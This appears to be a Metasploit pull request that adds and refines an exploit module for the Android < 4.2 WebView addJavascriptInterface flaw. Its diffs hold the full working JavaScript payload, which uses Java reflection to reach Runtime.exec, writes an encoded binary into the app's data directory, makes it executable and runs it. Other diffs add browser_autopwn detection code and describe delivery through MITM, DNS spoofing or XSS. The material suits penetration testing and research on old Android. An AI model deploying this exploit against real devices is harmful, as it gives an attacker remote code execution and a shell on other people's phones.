### PR TITLE
Android < 4.2 WebView addJavascriptInterface RCE

### DIFF
--- a/data/js/detect/os.js
+++ b/data/js/detect/os.js
@@ -184,6 +184,9 @@ window.os_detect.getVersion = function(){
 			} else if (platform.match(/arm/)) {
 				// Android and maemo
 				arch = arch_armle;
+				if (navigator.userAgent.match(/android/i)) {
+					os_flavor = 'Android';
+				}
 			}
 		} else if (platform.match(/windows/)) {
 			os_name = oses_windows;

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -87,15 +87,15 @@ class Metasploit3 < Msf::Exploit::Remote
         var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
         
         // get the process name, which will give us our data path
-        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+        var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
         var ch, path = '/data/data/';
         while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
         path += '/#{Rex::Text.rand_text_alpha(8)}';
 
         // build the binary, chmod it, and execute it
-        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
-        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
-        m.invoke(null,null).exec([path]);
+        m.invoke(null, null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
+        m.invoke(null, null).exec(['chmod', '700', path]).waitFor();
+        m.invoke(null, null).exec([path]);
 
         return true;
       }

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
           A secondary attack vector involves the WebViews embedded inside a large number
           of Android applications. Ad integrations are perhaps the worst offender here.
-          If you can MITM the WebView's network connection, or can get a persistent XSS
+          If you can MITM the WebView's HTTP connection, or if you can get a persistent XSS
           into the page displayed in the WebView, then you can inject the html/js served
           by this module and get a shell.
 

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -27,10 +27,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Android < 4.2 Browser & WebView addJavascriptInterface Code Execution',
+      'Name'        => 'Android Browser and WebView addJavascriptInterface Code Execution',
       'Description' => %q{
-            This module exploits a privilege escalation issue that arises when untrusted
-          Javascript code is executed by an Android WebView component that has one or more
+            This module exploits a privilege escalation issue in Android < 4.2's WebView component
+          that arises when untrusted Javascript code is executed by a WebView that has one or more
           Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
           APIs exposed by the Interface and execute arbitrary commands.
 
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
         var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
-        
+
         // get the process name, which will give us our data path
         var p = m.invoke(null, null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
         var ch, path = '/data/data/';

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -1,13 +1,9 @@
-# ./sdk/tools/android and install Android 4.1.2 or below
-# 
-
 ##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
-# require 'rex/proto/proxy/http'
 
 class Metasploit3 < Msf::Exploit::Remote
 
@@ -26,6 +22,9 @@ class Metasploit3 < Msf::Exploit::Remote
           To use this module, the attacker must have some way to inject the html/js
           served by metasploit into an affected Webview on the target device. There
           are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
+
+          This module can also get a shell on some versions of the Android Browser for
+          Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
       },

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -8,6 +8,22 @@ require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserAutopwn
+
+  autopwn_info({
+    :os_flavor  => "Android",
+    :arch       => ARCH_ARMLE,
+    :javascript => true,
+    :rank       => ExcellentRanking,
+    :vuln_test  => %Q|
+      for (i in top) {
+        try {
+          top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+          is_vuln = true; break;
+        } catch(e) {}
+      }
+    |
+  })
 
   def initialize(info = {})
     super(update_info(info,
@@ -17,13 +33,13 @@ class Metasploit3 < Msf::Exploit::Remote
           arbitrary code on vulnerable Android devices. The issue is rooted in
           the use of the addJavascriptInterface function, which exposes Java
           Reflection to Javascript executing within a WebView instance. Many
-          Android ad networks are known to be affected.
+          Android ad network integrations are known to be affected.
 
           To use this module, the attacker must have some way to inject the html/js
           served by metasploit into an affected Webview on the target device. There
           are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
 
-          This module can also get a shell on some versions of the Android Browser for
+          This module can also get a shell on some versions of the Browser app on
           Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
@@ -60,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def js
     %Q|
-      function exec(obj,i) {
+      function exec(obj) {
         // ensure that the object contains a native interface
-        try { obj.getClass().getName(); } catch(e) { return false; }
+        try { obj.getClass().getName(); } catch(e) { return; }
 
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
@@ -77,12 +93,12 @@ class Metasploit3 < Msf::Exploit::Remote
         // build the binary, chmod it, and execute it
         m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
         m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
-        m.invoke(null,null).exec([path]).waitFor();
+        m.invoke(null,null).exec([path]);
 
         return true;
       }
 
-      for (i in window) { if (exec(window[i],i) === true) break; }
+      for (i in top) { if (exec(top[i]) === true) break; }
     |
   end
 

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -52,6 +52,8 @@ class Metasploit3 < Msf::Exploit::Remote
         'joev'   # static server
       ],
       'References'     => [
+        ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-'+
+                'addjavascriptinterface-code-execution-vulnerability/'],
         ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
         ['URL', 'http://50.56.33.56/blog/?p=314'],
         ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -7,7 +7,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 
-  include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::Remote::BrowserExploitServer
   include Msf::Exploit::Remote::BrowserAutopwn
 
   autopwn_info({
@@ -64,7 +64,13 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultOptions' => { 'PrependFork' => true },
       'Targets'        => [ [ 'Automatic', {} ] ],
       'DisclosureDate' => 'Dec 21 2012',
-      'DefaultTarget'  => 0
+      'DefaultTarget'  => 0,
+      'BrowserRequirements' => {
+        :source  => 'script',
+        :ua_ver  => /17\..*/,
+        :os_flavor  => "Android",
+        :arch       => ARCH_ARMLE
+      }
     ))
   end
 
@@ -73,9 +79,13 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("Serving javascript")
       send_response(cli, js, 'Content-type' => 'text/javascript')
     else
-      print_status("Serving HTML")
-      send_response_html(cli, html)
+      super
     end
+  end
+
+  def on_request_exploit(cli, req, browser)
+    print_status("Serving exploit HTML")
+    send_response_html(cli, html)
   end
 
   def js

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -27,20 +27,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
+      'Name'        => 'Android < 4.2 Browser/WebView addJavascriptInterface Code Execution',
       'Description' => %q{
-            This module exploits an issue where MITM attackers can execute 
-          arbitrary code on vulnerable Android devices. The issue is rooted in
-          the use of the addJavascriptInterface function, which exposes Java
-          Reflection to Javascript executing within a WebView instance. Many
-          Android ad network integrations are known to be affected.
+            This module exploits a privilege escalation issue that arises when untrusted
+          Javascript code is executed by an Android WebView component that has one or more
+          Interfaces added to it. The untrusted Javascript code can call into the Java Reflection
+          APIs exposed by the Interface and execute arbitrary commands.
 
-          To use this module, the attacker must have some way to inject the html/js
-          served by metasploit into an affected Webview on the target device. There
-          are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
+          Some distributions of the Android Browser app have an addJavascriptInterface
+          call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
+          4.1.2 release of Android is known to work.
 
-          This module can also get a shell on some versions of the Browser app on
-          Android < 4.2, where the vendor has added an addJavascriptInterface wrapper.
+          A secondary attack vector involves the WebViews embedded inside a large number
+          of Android applications. Ad integrations are perhaps the worst offender here.
+          If you can MITM the WebView's network connection, or can get a persistent XSS
+          into the page displayed in the WebView, then you can inject the html/js served
+          by this module and get a shell.
 
           Note: Adding a .js to the URL will return plain javascript (no HTML markup).
       },

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
     :vuln_test  => %Q|
       for (i in top) {
         try {
-          top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+          top[i].getClass().forName('java.lang.Runtime');
           is_vuln = true; break;
         } catch(e) {}
       }
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'Android < 4.2 Browser/WebView addJavascriptInterface Code Execution',
+      'Name'        => 'Android < 4.2 Browser & WebView addJavascriptInterface Code Execution',
       'Description' => %q{
             This module exploits a privilege escalation issue that arises when untrusted
           Javascript code is executed by an Android WebView component that has one or more
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
           Some distributions of the Android Browser app have an addJavascriptInterface
           call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
-          4.1.2 release of Android is known to work.
+          4.1.2 release of Android is known to be vulnerable.
 
           A secondary attack vector involves the WebViews embedded inside a large number
           of Android applications. Ad integrations are perhaps the worst offender here.
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
     %Q|
       function exec(obj) {
         // ensure that the object contains a native interface
-        try { obj.getClass().getName(); } catch(e) { return; }
+        try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 
         // get the runtime so we can exec
         var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -67,7 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'BrowserRequirements' => {
         :source  => 'script',
-        :ua_ver  => /17\..*/,
         :os_flavor  => "Android",
         :arch       => ARCH_ARMLE
       }

--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -1,0 +1,93 @@
+# ./sdk/tools/android and install Android 4.1.2 or below
+# 
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+# require 'rex/proto/proxy/http'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Android < 4.2 WebView addJavascriptInterface MITM Code Execution',
+      'Description' => %q{
+            This module exploits an issue where MITM attackers can execute 
+          arbitrary code on vulnerable Android devices. The issue is rooted in
+          the use of the addJavascriptInterface function, which exposes Java
+          Reflection to Javascript executing within a WebView instance. Many
+          Android ad networks are known to be affected.
+
+          To use this module, the attacker must have some way to inject the html/js
+          served by metasploit into an affected Webview on the target device. There
+          are a number of ways to do this (DNS spoofing, rogue HTTP proxy, XSS injection, etc).
+
+          Note: Adding a .js to the URL will return plain javascript (no HTML markup).
+      },
+      'License'     => MSF_LICENSE,
+      'Author'      => [
+        'jduck', # original msf module
+        'joev'   # static server
+      ],
+      'References'     => [
+        ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'],
+        ['URL', 'http://50.56.33.56/blog/?p=314'],
+        ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-'+
+                'addjavascriptinterface-remote-code-execution/']
+      ],
+      'Platform'       => 'linux',
+      'Arch'           => ARCH_ARMLE,
+      'DefaultOptions' => { 'PrependFork' => true },
+      'Targets'        => [ [ 'Automatic', {} ] ],
+      'DisclosureDate' => 'Dec 21 2012',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def on_request_uri(cli, req)
+    if req.uri.end_with?('js')
+      print_status("Serving javascript")
+      send_response(cli, js, 'Content-type' => 'text/javascript')
+    else
+      print_status("Serving HTML")
+      send_response_html(cli, html)
+    end
+  end
+
+  def js
+    %Q|
+      function exec(obj,i) {
+        // ensure that the object contains a native interface
+        try { obj.getClass().getName(); } catch(e) { return false; }
+
+        // get the runtime so we can exec
+        var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+        var data = "#{Rex::Text.to_hex(payload.encoded_exe, '\\\\x')}";
+        
+        // get the process name, which will give us our data path
+        var p = m.invoke(null,null).exec(['/system/bin/sh', '-c', 'cat /proc/$PPID/cmdline']);
+        var ch, path = '/data/data/';
+        while ((ch = p.getInputStream().read()) != 0) { path += String.fromCharCode(ch); }
+        path += '/#{Rex::Text.rand_text_alpha(8)}';
+
+        // build the binary, chmod it, and execute it
+        m.invoke(null,null).exec(['/system/bin/sh', '-c', 'echo "'+data+'" > '+path]).waitFor();
+        m.invoke(null,null).exec(['chmod', '700', path]).waitFor();
+        m.invoke(null,null).exec([path]).waitFor();
+
+        return true;
+      }
+
+      for (i in window) { if (exec(window[i],i) === true) break; }
+    |
+  end
+
+  def html
+    "<!doctype html><html><body><script>#{js}</script></body></html>"
+  end
+end


### PR DESCRIPTION
I was rewiring jduck's [module](https://github.com/jduck/addjsif/) for a side-channel attack on embedded Android WebView components, then noticed this actually gets you a shell on some versions of Android's Browser. So hooray, we now have an android browser exploit. Since it is easy to detect the presence of this vuln from JS code, I added it to browser_autopwn as well. A few other Android third party browsers were also vulnerable (notably baidu and QQ browsers: http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/)
- [x] Download the Android SDK, download the 4.1.2 SDK (GoogleAPIs version), and create a new 4.1.2 GoogleAPIs 4.1.2 AVD device
- [x] Run the simulator for the 4.1.2 device, run the msf module. Open the Android Browser app and browse to the URL specified in the module
- [x] Shells
